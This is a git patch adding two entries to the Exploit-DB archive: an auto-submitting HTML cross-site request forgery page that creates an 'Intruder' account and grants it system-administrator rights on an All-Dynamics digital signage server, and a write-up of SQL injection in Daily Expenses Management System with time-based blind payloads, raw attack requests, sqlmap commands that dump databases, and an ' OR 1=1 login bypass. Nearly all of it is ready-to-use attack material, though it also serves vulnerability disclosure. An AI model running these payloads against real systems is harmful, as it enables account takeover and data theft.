From a52cf4598fafcaa8820533850aebc691355c67cc Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 8 Aug 2020 05:01:49 +0000
Subject: [PATCH] DB: 2020-08-08

2 changes to exploits/shellcodes

All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
Daily Expenses Management System 1.0 - 'item' SQL Injection
---
 exploits/hardware/webapps/48736.txt |  89 +++++++++++++++
 exploits/php/webapps/48737.txt      | 171 ++++++++++++++++++++++++++++
 files_exploits.csv                  |   2 +
 3 files changed, 262 insertions(+)
 create mode 100644 exploits/hardware/webapps/48736.txt
 create mode 100644 exploits/php/webapps/48737.txt

diff --git a/exploits/hardware/webapps/48736.txt b/exploits/hardware/webapps/48736.txt
new file mode 100644
index 000000000..95a18c302
--- /dev/null
+++ b/exploits/hardware/webapps/48736.txt
@@ -0,0 +1,89 @@
+# Exploit Title: All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)
+# Discovery by: LiquidWorm
+# Discovery Date: 2020-08-05
+# Vendor Homepage: https://www.all-dynamics.de
+
+<!DOCTYPE html>
+<!--
+
+All-Dynamics Software enlogic:show Digital Signage System 2.0.2 CSRF Add Admin
+
+
+Vendor: All-Dynamics Software GmbH
+Product web page: https://www.all-dynamics.de
+Affected version: 2.0.2 (Build 2098) ILP32W 0/1/3/1597919619
+
+Summary: Bring communication with your customers, guests or employees
+to a new level. You can design content individually and uncomplicated
+centrally and simply present it in different locations. Whether on large
+displays, steles, digital signs or on a projector, with enlogic:show your
+content will appear on the selected display in a calendar-controlled and
+precise manner.
+
+Desc: The application interface allows users to perform certain actions
+via HTTP requests without performing any validity checks to verify the
+requests. This can be exploited to perform certain actions with administrative
+privileges if a logged-in user visits a malicious web site.
+
+Reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5577.php
+
+Tested on: enlogic:show server
+           Microsoft Windows Server 2019
+           Microsoft Windows Server 2016
+           Microsoft Windows Server 2012
+           Microsoft Windows 10
+           GNU/Linux
+           Apache
+           PHP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2020-5576
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5576.php
+
+
+21.07.2020
+
+-->
+
+
+<html>
+<body onload="runcsrf()">
+<h2>Grants the user the global administrative right. Administrative users are no longer under the control of the rights structure.</h2>
+<h1>Global: Superior rolebased rights.</h1>
+
+<form name="saveuser" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame0">
+<input type="hidden" name="SAVECMD" value="usr&#95;generic" />
+<input type="hidden" name="NEWUSER" value="1" />
+<input type="hidden" name="USERNAME" value="Intruder" />
+<input type="hidden" name="USERFULLNAME" value="ZSL" />
+<input type="hidden" name="USERTAGS" value="tags" />
+<input type="hidden" name="USEREMAIL" value="csrf&#64;zsl&#46;be" />
+<input type="hidden" name="USERPHONE" value="333&#45;222&#45;1111" />
+<input type="hidden" name="PWEXPIRE" value="0" />
+<input type="hidden" name="NEWPW1" value="Pa$$w0rd!" />
+<input type="hidden" name="NEWPW2" value="Pa$$w0rd!" />
+<input type="hidden" name="USERLANG" value="en" />
+<input type="hidden" name="STARTSCREEN" value="display&#46;calendar" />
+<input type="hidden" name="USERCUSTIMEOUT" value="20" />
+</form>
+
+<form name="addadmin" action="http://localhost:8802/index.php?PHPSESSID=5adb40dac43ddf2d05ea83d1a958ed65&ES_CMD=display.users.saveuser" method="POST" target="frame1">
+<input type="hidden" name="SAVECMD" value="usr&#95;rights" />
+<input type="hidden" name="SYSFLAGS&#91;&#93;" value="TYPE&#95;SYSADMIN" />
+</form>
+
+<iframe name="frame0"></iframe>
+<iframe name="frame1"></iframe>
+
+<script>
+function runcsrf() {
+document.saveuser.submit();
+document.addadmin.submit();
+}
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/php/webapps/48737.txt b/exploits/php/webapps/48737.txt
new file mode 100644
index 000000000..320a3aa2b
--- /dev/null
+++ b/exploits/php/webapps/48737.txt
@@ -0,0 +1,171 @@
+# Exploit Title: Daily Expenses Management System 1.0 - 'item' SQL Injection
+# Date: 2020-08-05
+# Exploit Author: Edo Maland
+# Vendor Homepage: https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
+# Software Link:  https://www.sourcecodester.com/php/14372/daily-tracker-system-phpmysql.html
+# Version: 1.0
+# Tested on: XAMPP / Windows 10
+
+-------------------------------------------------------------------------------------------------------------------------------------
+# Feature: Add Expenses
+# Vulnerable file: add-expense.php
+# Vulnerable parameter : 
+	- item
+	- costitem
+# PoC
+
+Url : http://example.com/dets/add-expense.php
+Methode : Post
+
+# Burpsuite Requests
+
+POST /dets/add-expense.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 138
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/add-expense.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+dateexpense=1337-11-11&item=1%27+AND+%28SELECT+8429+FROM+%28SELECT%28SLEEP%285%29%29%29IWeV%29+AND+%27hmPP%27%3D%27hmPP&costitem=2&submit=
+
+
+# Payload
+
+Parameter: #1* ((custom) POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: dateexpense=1337-11-11&item=1' AND (SELECT 8429 FROM (SELECT(SLEEP(5)))IWeV) AND 'hmPP'='hmPP&costitem=2&submit=
+
+# Sqlmap Command
+
+sqlmap -u "http://example.com/alphaware/summary.php?tid=1337*" --dbs --random-agent -v 3
+
+
+-------------------------------------------------------------------------------------------------------------------------------------
+# Feature: Edit Profile
+# Vulnerable file: user-profile.php
+# Vulnerable parameter : 
+	- fullname
+# PoC
+
+Url : http://example.com/dets/user-profile.php
+Methode : Post
+
+# Burpsuite Requests
+
+POST /dets/user-profile.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 189
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/user-profile.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+fullname=%27+AND+%28SELECT+2029+FROM+%28SELECT%28SLEEP%285%29%29%29JJJm%29+AND+%27UMUq%27%3D%27UMUq&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=
+
+
+# Payload
+
+Parameter: #1* ((custom) POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fullname=admin3' AND (SELECT 2029 FROM (SELECT(SLEEP(5)))JJJm) AND 'UMUq'='UMUq&email=info@sql.id&contactnumber=1337173137&regdate=2020-08-05 13:49:51&submit=
+
+
+
+# Sqlmap Command
+
+sqlmap -u "https://example.com/dets/user-profile.php" --data="fullname=admin3*&email=info%40sql.id&contactnumber=1337173137&regdate=2020-08-05+13%3A49%3A51&submit=" --random-agent --threads 5 --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9" -v 3 --dbs
+
+-------------------------------------------------------------------------------------------------------------------------------------
+
+# Feature: Expense Reports
+# Vulnerable file: 
+	- expense-monthwise-reports-detailed.php
+	- expense-datewise-reports.php
+	- expense-yearwise-reports.php
+
+
+# Vulnerable parameter : 
+	- fromdate
+	- todate
+
+# PoC
+
+Url : http://example.com/dets/expense-monthwise-reports-detailed.php
+Methode : Post
+
+# Burpsuite Requests
+
+POST /dets/expense-yearwise-reports-detailed.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/expense-yearwise-reports.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+fromdate=2020-08-13'+AND+(SELECT+1473+FROM+(SELECT(SLEEP(5)))rhGI)+AND+'moGo'%3d'moGo&todate=2020-08-20&submit=
+
+
+# Payload
+
+Parameter: #1* ((custom) POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: fromdate=2020-08-13' AND (SELECT 1473 FROM (SELECT(SLEEP(5)))rhGI) AND 'moGo'='moGo&todate=2020-07-29&submit=
+
+# Sqlmap Command
+
+sqlmap -u "https://example.com/dets/expense-monthwise-reports-detailed.php" --data="fromdate=2020-08-13*&todate=2020-07-29&submit=" --random-agent --cookie="PHPSESSID=lu0nb6l63bleu39pbjf5a954p9"  --dbs
+
+
+-------------------------------------------------------------------------------------------------------------------------------------
+# Feature: Login Page
+# Bypass Login Using SQLi on Admin/Member
+# Vulnerable file: index.php
+
+# PoC
+
+URL : https://example.com/dets/index.php
+
+Logging in with following details:
+
+	- Payload : "' OR 1=1 -- '"@sql.id
+
+# Burp Requests
+
+POST /dets/index.php HTTP/1.1
+Host: example.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: id,en-US;q=0.7,en;q=0.3
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 50
+Origin: http://example.com
+Connection: close
+Referer: http://example.com/dets/index.php
+Cookie: PHPSESSID=lu0nb6l63bleu39pbjf5a954p9
+Upgrade-Insecure-Requests: 1
+
+email="' OR 1=1 -- '"@sql.id&password=1337&login=login
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index afabbf828..5e151c9ed 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42977,3 +42977,5 @@ id,file,description,date,author,type,platform,port
 48730,exploits/php/webapps/48730.py,"Daily Expenses Management System 1.0 - 'username' SQL Injection",2020-08-04,"Daniel Ortiz",webapps,php,
 48733,exploits/php/webapps/48733.txt,"Stock Management System 1.0 - Authentication Bypass",2020-08-05,"Adeeb Shah",webapps,php,
 48734,exploits/php/webapps/48734.txt,"Victor CMS 1.0 - 'Search' SQL Injection",2020-08-06,screetsec,webapps,php,
+48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,
+48737,exploits/php/webapps/48737.txt,"Daily Expenses Management System 1.0 - 'item' SQL Injection",2020-08-07,screetsec,webapps,php,